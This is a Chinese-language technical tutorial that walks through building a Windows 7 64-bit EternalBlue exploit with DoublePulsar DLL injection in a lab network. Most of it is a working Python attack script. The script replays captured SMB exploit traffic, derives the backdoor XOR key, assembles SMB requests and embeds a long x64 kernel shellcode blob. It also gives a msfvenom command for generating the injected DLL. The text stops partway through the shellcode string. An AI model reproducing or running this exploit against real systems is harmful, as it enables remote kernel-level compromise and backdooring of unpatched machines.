【技术分享】EternalBlue之win7 64位exploit编写(二)

阅读量    80755 |   稿费 400

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

https://p2.ssl.qhimg.com/t01f040ee4fc48edf8a.png

作者:

预估稿费:400RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

前言

在上一篇文章中,原文链接: http://bobao.360.cn/learning/detail/4012.html

我们构造了针对于Win 7三十二位操作系统攻击exploit,本节将完成一个win7 64位的exploit


上节回顾

win7 三十二位的exploit是由两部分功能代码组成的,一个是安装后门(Eternalblue) ,另一个则是后门维持(Doublepulsar)

1.Win7三十二位与六十四位安装后门 实际就是hook了ntdll!kiFastCallEntry。所以内核层函数的hook(后门安装)也是受内核版本影响

2.注入部分。没什么解释的,通常情况32位dll只能注入32位进程, 64位dll只能注入64位进程

想多了解些的可以读下15pb 赵神这篇 (关于32位和64位进程互读互写)

实验环境

网络环境: 局域网

攻击ip: 192.168.157.129(win7_x86)

靶机ip: 192.168.157.130(win7_x64)

工具: NSA的fb.py、wireshark、python、hex editor、

实验步骤

0x1: 一样的套路 开wireshark监听port 445捕捉到Eternalblue的数据流

http://p5.qhimg.com/t01154e6d6890498bbc.png

0x2: 捕捉Doubleplusar动作的数据流

在六十四位下和三十二位包的数量都是一样的,可能不同就在某个字段上。

http://p3.qhimg.com/t018f19e8acdfcfeefb.png

0x3: 数据包处理

接着就用上节的脚本来把Eternalblue攻击的数据包序列化供给我们的python调用

接着就是手动去分析Doubleplusar 在六十四位和三十二位的不同,参考文章:

http://bobao.360.cn/learning/detail/4074.html

发现是signature字段 

三十二位: xxxxxxxxx0xxxxxx

六十四位: xxxxxxxxx1xxxxxx

http://p4.qhimg.com/t01e23c106e4a5ba0f4.png   

http://p2.qhimg.com/t01ab78a9f708b987ed.png

其他没什么问题。

0x4: exploit构造脚本

关于测试dll的生成:

 kali-> msfvenom -p windows/x64/exec CMD="calc.exe" -f dll > /x64.dll

这样生成就可以, 上面我用Doublepuls注入的dll是用msf生的。 注入哪个进程随你,脚本中默认是explorer。

测试dll要选择64位dll。否则可能出现蓝屏现象。

#!/usr/bin/python
# -*- coding: utf-8 -*-

import socket
import time
import ast
import binascii
import struct

HOST ='192.168.157.130'
PORT = 445
dllfile = "x64_calc.dll"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((HOST,PORT))

def Install_Backdoor():
	backlog = open("eternalblue.replay").read().split("nn")
	backlog = [ast.literal_eval(i) for i in backlog]
	connections = []
	start = time.time()
	for i in backlog:
	delta = i[-1] - (start - time.time())
		print(i[0], delta)
		if delta > 0:
			time.sleep(delta)
		start = time.time()
		if i[0] == "connect":
			sock = socket.socket()
			sock.connect((HOST , PORT ))
			connections.append({"socket":sock,"stream" : i[1]})
		if i[0] == "close":
			[j['socket'].close() for j in connections if j["stream"] == i[1]]
		if i[0] == "send":
			[j['socket'].send(i[2]) for j in connections if j["stream"] == i[1]]
		if i[0] == "recv":
			[j['socket'].recv(2048) for j in connections if j['stream'] == i[1]]
			
def calculate_doublepulsar_xor_key(s):
	"""Calaculate Doublepulsar Xor Key
	"""
	x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
	x = x & 0xffffffff  # this line was added just to truncate to 32 bits
	return x

def make_unicode_host(org_host):
	host_len = len(org_host)
	new_host = ""
	for i in range(host_len):
		new_host =new_host + "x00" + org_host[i]
	return new_host

def get_smb_signature(smb_data):
	print binascii.b2a_hex(smb_data[18:22])
	return smb_data[18:22]
	
	def get_key(smb_data):
	smb_sign = struct.unpack("<I",get_smb_signature(smb_data))[0]
	print "smb_sign:","0x%X"%(smb_sign)
	int_key = calculate_doublepulsar_xor_key(smb_sign)
	print  "int_key:","0x%X"%(int_key)
	key=struct.pack("<I",int_key)
	print "key:",binascii.b2a_hex(key)
	return key

def xor_data(org_data , key):
	#异或加密
	newdata = ""
	for i in range(len(org_data)):
		newdata += chr(ord(org_data[i]) ^ ord(key[i%len(key)]))
	
	#print binascii.b2a_hex(newdata)
	return newdata	
	
def make_smb_request(send_data , key):
	data_len = len(send_data)
	array = []
	ncount = data_len / 4096
	if (data_len % 4096) > 0:
		ncount += 1
	make_data =""

	for i in range(ncount):
		if i < ncount-1:
			smb_Length = struct.pack(">H",4096 +32 +34 + 12)
			#print binascii.b2a_hex(smb_Length)
			totalDataCount = struct.pack("<H",4096)
			byteCount = struct.pack("<H",4096 + 13)
			make_data = send_data[i*4096:(i+1)*4096]
		else:
			smb_Length = struct.pack(">H",data_len - 4096*i +32 +34 + 12)
			totalDataCount = struct.pack("<H",data_len - 4096*i)
			byteCount = struct.pack("<H",data_len - 4096*i+ 13)
			make_data = send_data[i*4096:]
					
		netBIOS_header = "x00x00"+ smb_Length
		smb_header = "xFFx53x4Dx42x32x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x42x00"
		transRequest_header = "x0Fx0Cx00"+ totalDataCount +"x01x00x00x00x00x00x00x00xF0xCCx0Cx00x00x00x0Cx00x42x00"+totalDataCount+"x4Ex00x01x00x0Ex00"+ byteCount +"x00"
		data_index = struct.pack(">H",i*0x10)
		data_header = "x00x2Cx00x00"+totalDataCount+"x00x00"+data_index+"x00x00"
		#print "data_index:",binascii.b2a_hex(data_index)
		#print "data_header:",binascii.b2a_hex(data_header)
		#print len(data_header)
		array.append(netBIOS_header + smb_header +transRequest_header + xor_data(data_header + make_data,key))
	return array , ncount
	
if __name__ == "__main__":
	#安装后门
	Install_Backdoor()
	print "------Install backdoor done!------"
	#上传并执行dll

	#smb 头是32字节 请求包50字节 ,以下一行30字节
	#smb版本
	step_0_data ="x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x00x40x00x00x62x00x02x50x43x20x4Ex45x54x57x4Fx52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6Fx77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54x20x4Cx4Dx20x30x2Ex31x32x00"
	s.sendall(step_0_data)
	data = s.recv(1024)
	print 0,data
	#windows系统版本
	step_1_data ="x00x00x00x88xFFx53x4Dx42x73x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x00x40x00x0DxFFx00x88x00x04x11x0Ax00x00x00x00x00x00x00x01x00x00x00x00x00x00x00xD4x00x00x00x4Bx00x00x00x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00x2Ex00x30x00x00x00"
	s.sendall(step_1_data)
	data = s.recv(1024)
	print 1,data

	#对方ip地址 x.x.x.x 其中有2个字节与x86的不一致
	str_ip = "xFFx53x4Dx42x75x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFEx00x08x40x00x04xFFx00x5ex00x08x00x01x00x33x00x00x5Cx00x5C"+ make_unicode_host(HOST)+"x00x5Cx00x49x00x50x00x43x00x24x00x00x00x3Fx3Fx3Fx3Fx3Fx00"
	step_2_data ="x00x00x00"+chr(len(str_ip))+ str_ip
	#print binascii.b2a_hex(step_2_data)
	#print step_2_data
	s.sendall(step_2_data)
	data = s.recv(1024)
	print 2,data
	#验证得到signature
	step_3_data ="x00x00x00x4ExFFx53x4Dx42x32x00x00x00x00x18x07xC0x00x00x00x00x00x00x00x00x00x00x00x00x00x08xFFxFEx00x08x41x00x0Fx0Cx00x00x00x01x00x00x00x00x00x00x00x1Fx36xCEx00x00x00x0Cx00x42x00x00x00x4Ex00x01x00x0Ex00x0Dx00x00x00x00x00x00x00x00x00x00x00x00x00x00"
	s.sendall(step_3_data)
	response = s.recv(1024)
	print 3,response
	print 3,binascii.b2a_hex(response)

	key = get_key(response)
	#shellcode+dll
        kernel_shellcode ="x48x89xE0x66x83xE4xF0x41x57x41x56x41x55x41x54x53x51x52x55x57x56x50x50xE8xBCx06x00x00x48x89xC3x48xB9xDFx81x14x3Ex00x00x00x00xE8x26x05x00x00x48x85xC0x0Fx84x55x03x00x00x48x89x05x9Cx07x00x00x48xB9xBAx1Ex03xA0x00x00x00x00xE8x07x05x00x00x48x85xC0x0Fx84x36x03x00x00x48x89x05x85x07x00x00x48xB9x84x06xE7xF9xFFxFFxFFxFFxE8xE8x04x00x00x48x85xC0x0Fx84x17x03x00x00x48x89x05x6Ex07x00x00x48xB9x4FxFExEBx15x00x00x00x00xE8xC9x04x00x00x48x85xC0x0Fx84xF8x02x00x00x48x89x05x57x07x00x00x48xB9xF9x30xACxA4x00x00x00x00xE8xAAx04x00x00x48x85xC0x0Fx84xD9x02x00x00x48x89x05x40x07x00x00x48xB9xCAxBExD0xECx00x00x00x00xE8x8Bx04x00x00x48x85xC0x0Fx84xBAx02x00x00x48x89x05x29x07x00x00x48xB9xAExB8x9Fx5DxFFxFFxFFxFFxE8x6Cx04x00x00x48x85xC0x0Fx84x9Bx02x00x00x48x89x05x12x07x00x00x48xB9x94x01x69xE3xFFxFFxFFxFFxE8x4Dx04x00x00x48x85xC0x0Fx84x7Cx02x00x00x48x89x05xFBx06x00x00x48xB9xF6x10x00xB8xFFxFFxFFxFFxE8x2Ex04x00x00x48x85xC0x0Fx84x5Dx02x00x00x48x89x05xE4x06x00x00x48xB9xCAxD6x5FxD2xFFxFFxFFxFFxE8x0Fx04x00x00x48x85xC0x0Fx84x3Ex02x00x00x48x89x05xCDx06x00x00x48xB9x79xA8x24x11x00x00x00x00xE8xF0x03x00x00x48x85xC0x0Fx84x1Fx02x00x00x48x89x05xB6x06x00x00x48xB9x37xC6x90x4Fx00x00x00x00xE8xD1x03x00x00x48x85xC0x0Fx84x00x02x00x00x48x89x05x9Fx06x00x00x48xB9x6CxE7xFEx10x00x00x00x00xE8xB2x03x00x00x48x85xC0x0Fx84xE1x01x00x00x48x89x05x88x06x00x00xE8x4Fx03x00x00x8Bx05x85x06x00x00x85xC0x0Fx84xC7x01x00x00xE8xD9x01x00x00x48x85xC0x0Fx84xB9x01x00x00x4Cx8Dx0Dx94x06x00x00x41x8Bx09x51x51x6Ax40x68x00x10x00x00x4Dx31xC0x48x8Dx15xD2x05x00x00x48xB9xFFxFFxFFxFFxFFxFFxFFxFFx48x83xECx20xFFx15x06x06x00x00x48x83xC4x38x59x89x0Dx5Fx06x00x00x48x85xC0x0Fx85x22x01x00x00x48x8Dx35x57x06x00x00x48x8Bx3Dx9Cx05x00x00xF3xA4x80x3Dx2Fx06x00x00x01x74x05xE8x96x02x00x00x48x8Bx35x4Dx05x00x00x8Bx0Dx0Fx06x00x00x48x01xCEx48x89xF1x44x8Bx25x06x06x00x00x48x8Bx11x48x39xD6x0Fx84xDEx00x00x00x48x31xC0x8Bx05xDDx05x00x00x48x29xC2x51x52x48x89xD1x48x83xECx20xFFx15xC3x05x00x00x48x83xC4x20x5Ax59x48x85xC0x74x2Ex4Dx31xC9x44x8Bx0DxCEx05x00x00x4Ax8Bx04x08x48x85xC0x74x1Bx4Cx01xE2x80x3DxBFx05x00x00x01x74x07x80x3Ax01x74x0FxEBx08x8Bx02x0FxBAxE0x05x72x05x48x8Bx09xEBx9Bx4Cx29xE2x48x89x15x0Bx05x00x00x48xBAx90x00x00x00x00x00x00x00x48x31xC9x48x83xECx40xFFx15x3Cx05x00x00x48x83xC4x40x48x85xC0x74x5Bx48x89x05xECx04x00x00xC6x80x80x00x00x00xC3x48x31xC9x51x6Ax01xFFx35xC9x04x00x00x51x4Cx8Dx88x80x00x00x00x4Dx31xC0x48x8Bx15xBFx04x00x00x48x89xC1x48x83xECx20xFFx15x02x05x00x00x48x83xC4x40x4Dx31xC9x4Dx31xC0x48x31xD2x48x8Bx0DxA6x04x00x00x48x83xECx20xFFx15xECx04x00x00x48x83xC4x20x48x83xECx20x48x8Dx0Dx4Dx04x00x00xFFx15xAFx04x00x00x48x8Bx0Dx38x04x00x00xFFx15xAAx04x00x00x48x83xC4x20x48x31xC0x48x8Dx3Dx9AxFCxFFxFFx48xB9x70x03x00x00x00x00x00x00xF3xAAx48x8Dx3Dx2Ax00x00x00x48xB9xD3x04x00x00x00x00x00x00x48x03x0DxE4x04x00x00xF3xAAx58x58x5Ex5Fx5Dx5Ax59x5Bx41x5Cx41x5Dx41x5Ex41x5Fx48x89xC4x48x31xC0xC3x53x56x51x52x48xB9x08x00x00x00x00x00x00x00x51x48x8Dx15xD1x03x00x00x48x83xECx20xFFx15x17x04x00x00x48x83xC4x20x48x85xC0x0Fx85xDDx00x00x00x48x8Bx35xB3x03x00x00x48x31xDBx8Bx1Dx66x04x00x00x8Bx04x1Ex83xF8x02x0Fx8CxB0x00x00x00x48x89xF1x48x83xECx20xFFx15xE9x03x00x00x48x83xC4x20xE8x57x02x00x00x8Bx0Dx5Ax04x00x00x39xC8x0Fx85x8Cx00x00x00x48x8Dx15x7Bx03x00x00x48x89xF1x48x83xECx20xFFx15xC6x03x00x00x48x89xF1xFFx15xC5x03x00x00x48x83xC4x20x48x85xC0x74x49x48x31xDBx8Bx1Dx0Bx04x00x00x48x8Bx04x18x48x85xC0x74x37x48x31xC9x8Bx1DxFDx03x00x00x66x8Bx0Cx18x48x8Bx44x18x08x48x85xC0x74x20x48x31xDBx8Bx1Dx02x04x00x00x48x29xD9x7Cx12x48x01xC8xE8x2Bx02x00x00x8Bx0DxEBx03x00x00x39xC8x74x3Fx31xC0x89x05x03x03x00x00x48x8Dx0Dx04x03x00x00x48x83xECx20xFFx15x62x03x00x00x48x83xC4x20x48x89xF1x48x83xECx20xFFx15x59x03x00x00x48x83xC4x20x59x81xF9x00x00x01x00x7Fx0Ex83xC1x04xE9xF3xFExFFxFFx59x48x89xF0xEBx03x48x31xC0x5Ax59x5Ex5BxC3x48x8Bx35xB7x02x00x00x8Bx0Dx79x03x00x00x48x01xCEx48x8Bx16x8Bx05x5Dx03x00x00x48x29xC2x48x31xC0x48xFFxC8x48xC1xE0x2Cx48x8Bx12x48x39xC2x72x0BxB8xE8x03x00x00x89x05x3Dx03x00x00xC3x56x51x52x48x83xECx20xFFx15x1Fx03x00x00x48x89xC6x8Bx05x36x03x00x00x48x01xC6xFFx15x05x03x00x00x48x89xF1x48x39xF0x77x17x48x8Dx90x00x05x00x00x48x39xF2x72x0Bx48x29xC6x89x35x00x03x00x00xEBx08x48x8Bx36x48x39xCEx75xDCx48x83xC4x20x5Ax59x5ExC3x53x52x51x55x48x89xE5x48x81xECx00x01x00x00x57x48x89xCFx48x89xD8x48x89x85x00xFFxFFxFFxE8xBBx00x00x00x48x89x85x08xFFxFFxFFxE8x48x01x00x00x48x89x85x10xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x9Ax01x00x00x48x89x85x18xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x8Fx01x00x00x48x89x85x20xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x8Bx8Dx08xFFxFFxFFxE8x84x01x00x00x48x89x85x28xFFxFFxFFx48x8Bx85x00xFFxFFxFFx48x89xF9x48x8Bx95x20xFFxFFxFFx48x8Bx9Dx10xFFxFFxFFxE8x0Fx01x00x00x48x89x85x30xFFxFFxFFx48x8Bx85x28xFFxFFxFFx48x8Bx8Dx30xFFxFFxFFxE8x55x01x00x00x66x89xC2x48x8Bx85x00xFFxFFxFFx48x8Bx8Dx18xFFxFFxFFxE8x49x01x00x00x5Fx48x81xC4x00x01x00x00x5Dx59x5Ax5BxC3x56x57x48x31xF6x8Bx70x3Cx48x01xC6x66x81x3Ex50x45x75x12x48x81xC6x88x00x00x00x48x31xFFx8Bx3Ex48x01xF8x5Fx5ExC3x48x31xC0xEBxF8x56x51x57x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xC9x8Ax0Ex80xF9x00x74x07x01xC8x48xFFxC6xEBxE7x5Fx59x5ExC3x56x57x52x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xD2x8Ax16x01xD0x48xFFxC6xE2xECx5Ax5Fx5ExC3x56x51x57x48x89xC6x48x31xC0x89xC7xC1xE7x07x29xC7x89xF8x31xC9x8Ax0Ex80xF9x00x74x0Ax01xC8x48xFFxC6x48xFFxC6xEBxE4x5Fx59x5ExC3x56x48x89xC6x48x83xC6x18x48x31xC0x8Bx06x5ExC3x53x65x48x8Bx04x25x38x00x00x00x48x8Bx40x04x48xC1xE8x0Cx48xC1xE0x0Cx48x8Bx18x66x81xFBx4Dx5Ax74x08x48x2Dx00x10x00x00xEBxEEx5BxC3x57x56x51x48x31xFFx48x89xC6x48x31xC0x8Bx04xBAx48x01xF0xE8x40xFFxFFxFFx39xC8x74x0Ex48xFFxC7x48x39xDFx74x0BxEBxE4x59x5Ex5FxC3x48x89xF8xEBxF7x48x31xC0xEBxF2x56x48x89xC6x48x31xC0x8Bx41x1Cx48x01xF0x5ExC3x56x48x89xC6x48x31xC0x8Bx41x20x48x01xF0x5ExC3x56x48x89xC6x48x31xC0x8Bx41x24x48x01xF0x5ExC3x48xD1xE1x48x01xC8x66x8Bx00xC3x48x81xCAx00x00xFFxFFx48x81xF2x00x00xFFxFFx48xC1xE2x02x48x01xD1x48x31xD2x8Bx11x48x01xD0xC3x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x28x03x00x00x20x00x00x00x70x00x00x00x08x03x00x00x4Cx00x00x00xC8x02x00x00x01x00x00x00xBDxA2x37x83x00x00x00x00x00x00x00x00x8Ax23x00x00x00x00x00x00x53x55x57x56x41x54x41x55x41x56x41x57x48x89xE0x48x89xE1x48x83xE1x08x48x29xCCx48x81xECx00x04x00x00xE8x00x00x00x00x5Dx48x89xE6x48x89x06x48x81xECx00x04x00x00x48x8Dx3DxD2x0Ex00x00x49x89xF0x48x83xC6x08x48x31xC9x8Ax0Fx84xC9x74x3Fx48xFFxC7x8Bx0Fx48x83xC7x04x8Bx17x48x83xC7x04x84xD2x74x2CxE8xD4x0Dx00x00x51x0FxB6x0Fx48x85xC9x59x75x09x48x85xC0x0Fx84xB9x0Dx00x00x48x89x06x48x83xC6x08x30xC0x48x83xC7x01x3Ax47x04x74xCCxEBxB8x4Cx89xC6x48x89x25x3Dx0Dx00x00x48x89x2Dx3Ex0Dx00x00x48x89x35x3Fx0Dx00x00x90xE8x00x00x00x00x59x4Dx31xC9x49x89xC8x48x31xD2xB2x01x48x8Dx0Dx2Ex0Dx00x00x48x83xECx20xFFx56x38x48x83xC4x20x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x31xD2x8Bx95x5Dx0Fx00x00x48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x0Fx84xCFx0Cx00x00x48x89xC3x56x8Bx8Dx5Dx0Fx00x00x48x8Dx35x80x0Ex00x00x48x89xDFxF3xA4x5Ex48x89x5Ex48x48x31xC0x8Bx85x5Dx0Fx00x00x48x89x46x50x48x31xC9x8Bx8Dx5Dx0Fx00x00x48x8Dx3Dx59x0Ex00x00x31xC0xF3xAAx48x31xC0x48x89x46x58x48x89x46x60x48x89x46x68x48x8Dx05x77x09x00x00x48x89x05xC4x02x00x00x48x8Dx05x71x09x00x00x48x89x05xBEx02x00x00x48x8Dx05x78x09x00x00x48x89x05xB8x02x00x00x48x8Dx05x86x09x00x00x48x89x05xB2x02x00x00x48x8Dx05xA7x08x00x00x48x89x05xACx02x00x00x55x48x8Dx2DxD6x01x00x00x48x8Bx7Ex48xE8xA3x02x00x00x48x85xC0x0Fx85x13x01x00x00xE8x1Ax03x00x00x48x85xC0x0Fx84x05x01x00x00x48x89x45x20x48x8Bx7Dx08x48x83xC7x30x48x8Bx3Fx48x8Bx45x20x48x29xF8x48x89x45x28xE8x64x03x00x00x48x85xC0x0Fx85xDDx00x00x00xE8xE6x03x00x00x48x85xC0x0Fx85xCFx00x00x00xE8x4Ex05x00x00x48x85xC0x0Fx85xC1x00x00x00xE8x57x05x00x00x48x85xC0x0Fx85xB3x00x00x00xE8x57x06x00x00x48x85xC0x0Fx85xA5x00x00x00xE8xBAx06x00x00x48x85xC0x0Fx85x97x00x00x00xE8xC6x07x00x00x48x85xC0x0Fx85x89x00x00x00x48x8Bx45x20x48x89x46x70x48x8Bx45x18x48x89x46x78x5Dx8Bx85x61x0Fx00x00x89x86x80x00x00x00x48x8Bx56x70x48x63x42x3Cx48x8Dx9Cx10x88x00x00x00x48x85xDBx74x48x8Bx1Bx48x01xD3x83x7Bx14x00x74x3Dx8BxBEx80x00x00x00x2Bx7Bx10x3Bx7Bx14x7Fx2Fx8Bx4Bx1Cx48x01xD1x8Bx04xB9x48x01xD0x48x83xECx20x4Cx8Bx46x50x48x8Bx56x48x48xB9x02x00x00x00x00x00x00x00xFFxD0x48x83xC4x20x48x89x86x88x00x00x00x55x48x8Dx2DxB8x00x00x00xE8x28x07x00x00xEBx00x48x8Bx4Dx78x48x85xC9x74x0Bx48x83xECx20xFFx56x40x48x83xC4x20x48x8Bx7Dx20x48x85xFFx0Fx84x8Ax00x00x00x4Cx8Dx8DxAAx00x00x00x49xB8x40x00x00x00x00x00x00x00x48x8Bx55x50x48x8Bx4Dx20x48x83xECx20xFFx56x30x48x83xC4x20x48x85xC0x74x09x48x8Bx4Dx50x48x31xC0xF3xAAx49xB8x00x80x00x00x00x00x00x00x48xBAx00x00x00x00x00x00x00x00x48x8Bx4Dx20x48x83xECx20xFFx56x10x48x83xC4x20x48x8Bx7Dx60x48x85xFFx74x2Cx48x8Bx4Dx68x48x31xC0xF3xAAx49xB8x00x80x00x00x00x00x00x00x48xBAx00x00x00x00x00x00x00x00x48x8Bx4Dx60x48x83xECx20xFFx56x10x48x83xC4x20x5DxE9x60x0Ax00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x48xB8xFFxFFxFFxFFxFFxFFxFFxFFxE9x2ExFCxFFxFFx6Dx73x76x63x72x74x2Ex64x6Cx6Cx00x6Dx73x76x63x72x74x64x2Ex64x6Cx6Cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x57x52x53x48x89x7Dx00x48x89xFAx48x83xC2x00x66x8Bx1Ax66x81xFBx4Dx5Ax75x63x48x89xFAx48x83xC2x3Cx48x31xDBx8Bx1Ax48x01xDFx48x89x7Dx08x48x89xFAx48x83xC2x00x8Bx1Ax81xFBx50x45x00x00x75x3Fx48x89xFAx48x83xC2x18x66x8Bx1Ax66x81xFBx0Bx02x75x2Ex48x89xFAx48x83xC2x14x48x31xDBx66x8Bx1Ax48x89xFAx48x83xC2x18x48x01xDAx48x89x55x10x48x89xFAx48x81xC2x88x00x00x00x48x89x55x18x48x31xC0xEBx06x48x31xC0x48xF7xD0x5Bx5Ax5FxC3x57x52x53x48x8Bx7Dx08x48x83xC7x50x48x31xDBx8Bx1Fx48x89x5Dx50x48x8Bx7Dx08x48x83xC7x30x48x8Bx17x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xD1x48x89xDAx48x83xECx20xFFx56x08x48x83xC4x20x48x85xC0x75x25x49xB9x40x00x00x00x00x00x00x00x49xB8x00x30x00x00x00x00x00x00x48x89xDAx48x31xC9x48x83xECx20xFFx56x08x48x83xC4x20x5Bx5Ax5FxC3x57x52x53x51x56x48x8Bx76x48x48x8Bx7Dx20x48x8Bx5Dx08x48x83xC3x54x48x31xC9x8Bx0BxF3xA4x5Ex48x8Bx7Dx08x48x83xC7x06x48x31xDBx66x8Bx1Fx48x31xD2x48x39xD3x74x4Dx48xB8x28x00x00x00x00x00x00x00x52x48xF7xE2x5Ax48x03x45x10x56x48x8Bx76x48x48x89xC1x48x83xC1x14x4Dx31xD2x44x8Bx11x4Cx01xD6x48x8Bx7Dx20x48x89xC1x48x83xC1x0Cx4Dx31xD2x44x8Bx11x4Cx01xD7x48x83xC0x10x48x31xC9x8Bx08xF3xA4x5Ex48xFFxC2xEBxAEx48x31xC0xEBx06x48x31xC0x48xF7xD0x59x5Bx5Ax5FxC3x57x52x53x51x48x8Bx7Dx20xE8x6CxFExFFxFFx48x85xC0x0Fx85x50x01x00x00xE8x1Fx05x00x00x48x85xC0x0Fx85x42x01x00x00x48x8Bx7Dx00x48xB8x08x00x00x00x00x00x00x00x48xBAx01x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x83xC2x00x48x31xDBx8Bx1Ax48x01xFBx48x89x5Dx30x48x39xFBx0Fx84x0Fx01x00x00x49x89xDAx49x83xC2x10x48x31xC0x41x8Bx02x48x85xC0x0Fx84xF9x00x00x00x48x8Bx45x00x48x89xDAx48x83xC2x0Cx4Dx31xD2x44x8Bx12x4Cx01xD0x48x89xC1x48x83xECx20xFFx56x18x48x83xC4x20x48x85xC0x0Fx84xC6x00x00x00x48x89x45x48x48x89xDAx48x83xC2x00x48x8Bx7Dx00x4Dx31xD2x44x8Bx12x4Cx01xD7x48x89x7Dx38x48x89xDAx48x83xC2x10x48x8Bx7Dx00x4Dx31xD2x44x8Bx12x4Cx01xD7x48x89x7Dx40x48x8Bx55x38x48x8Bx12x48x85xD2x74x7Dx48x89xD7x49xBAx00x00x00x00x00x00x00x80x4Cx21xD7x74x0Cx48x89xD7x48x81xE7xFFxFFx00x00xEBx0Bx48x8Bx7Dx00x48x01xD7x48x83xC7x02x48x89xFAx48x8Bx4Dx48x48x83xECx20xFFx56x20x48x83xC4x20x48x85xC0x74x46x48x8Bx55x40x48x89x02xE8x07x06x00x00x48x85xC0x74x0FxE8x97x05x00x00x48x85xC0x75x05xE8xF0x04x00x00x48x8Bx55x38x48x83xC2x08x48x89x55x38x48x8Bx55x40x48x83xC2x08x48x89x55x40xE9x77xFFxFFxFFx48x83xC3x14xE9xF9xFExFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x48x8Bx7Dx08x48x83xC7x30x48x8Bx55x20x48x89x17x48x31xC0x5Ax5FxC3x57x52x53x51x48x8Bx55x28x48x85xD2x0Fx84xF5x00x00x00x48xB8x08x00x00x00x00x00x00x00x48xBAx05x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x49x89xD2x49x83xC2x04x48x31xFFx41x8Bx3Ax48x85xFFx0Fx84xC1x00x00x00x49x89xD2x49x83xC2x00x48x31xFFx41x8Bx3Ax48x85xFFx0Fx84xA3x00x00x00x48x8Bx55x20x48x01xFAx49x89xD2x49x83xC2x04x41x8Bx3Ax48x85xFFx0Fx84x91x00x00x00x48x83xEFx08x48xD1xEFx48x31xC9x48x39xF9x74x65x48x89xD3x48x83xC3x08x48x89xC8x48xD1xE0x48x01xC3x48xC7x45x58x00x00x00x00x66x8Bx03x66x25x00xF0x66xC1xE8x0Cx66x83xF8x00x74x37x66x83xF8x03x74x06x66x83xF8x0Ax75x2Bx49x89xD2x49x83xC2x00x41x8Bx02x48x89x45x58x48x31xC0x66x8Bx03x66x25xFFx0Fx48x01x45x58x48x8Bx45x20x48x03x45x58x48x8Bx5Dx28x48x01x18x48xFFxC1xEBx96x49x89xD2x49x83xC2x04x48x31xFFx41x8Bx3Ax48x01xFAxE9x64xFFxFFxFFx48x31xC0x48xF7xD0xEBx03x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x48xB8x08x00x00x00x00x00x00x00x48xBAx03x00x00x00x00x00x00x00x48xF7xE2x48x8Bx55x18x48x01xC2x48x89xD1x48x83xC1x04x48x31xC0x8Bx01x48x85xC0x74x36x48x89xD1x48x83xC1x00x48x31xFFx8Bx39x48x85xFFx74x25x48x8Bx4Dx20x49x89xC8x48x01xF9x48x89x4Dx78x48x31xD2xBFx0Cx00x00x00xF7xF7x89xC2x48x83xECx20xFFx56x38x48x83xC4x20x48x31xC0x59x5Bx5Ax5FxC3x57x52x53x51x48x8Bx7Dx08x48x83xC7x06x48x31xDBx66x8Bx1Fx48x31xD2x48x39xD3x0Fx84xE6x00x00x00x48xB8